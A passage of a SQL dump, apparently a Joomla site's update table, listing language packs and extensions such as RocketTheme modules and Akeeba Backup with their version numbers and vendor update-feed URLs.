AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21215,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21216,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21217,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21218,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21219,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21220,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21221,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21222,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21223,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21224,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21225,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21226,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21227,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21228,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21229,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21230,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21231,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21232,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21233,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21234,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21235,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21236,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21237,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21238,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21239,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21240,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21241,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21242,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21243,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21244,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21245,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21246,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21247,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21248,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21249,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21250,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21251,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21252,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21253,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21254,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21255,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21256,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21257,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21258,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21259,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21260,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21261,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21262,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21263,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21264,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21265,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21266,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21267,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21268,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21269,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21270,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21271,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21272,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21273,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21274,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21275,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21276,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21277,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21278,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21279,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21280,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21281,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21282,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21283,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21284,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21285,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21286,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21287,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21288,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21289,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21290,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21291,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21292,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21293,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21294,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21295,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21296,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21297,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21298,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21299,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21300,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21301,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21302,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21303,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21304,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21305,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21306,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21307,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21308,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21309,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21310,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21311,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21312,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21313,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21314,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21315,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21316,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21317,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21318,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21319,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21320,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21321,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21322,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21323,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21324,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21325,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21326,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21327,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21328,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21329,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21330,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21331,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21332,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21333,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21334,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21335,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21336,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21337,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21338,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21339,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21340,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21341,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21342,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21343,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21344,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21345,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21346,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21347,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21348,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21349,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21350,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21351,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21352,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21353,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21354,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21355,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21356,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21357,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21358,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21359,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21360,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21361,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21362,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21363,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21364,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21365,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21366,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21367,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21368,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21369,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21370,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21371,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21372,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21373,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21374,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21375,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21376,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21377,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21378,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21379,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21380,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21381,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21382,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21383,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21384,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21385,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21386,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21387,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21388,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21389,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21390,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21391,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21392,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21393,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21394,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21395,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21396,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21397,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21398,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21399,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21400,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21401,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21402,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21403,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21404,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21405,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21406,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21407,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21408,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21409,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21410,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21411,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21412,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21413,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21414,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21415,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21416,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21417,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21418,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21419,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21420,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21421,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21422,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21423,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21424,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21425,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21426,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21427,3,0,'Chinese 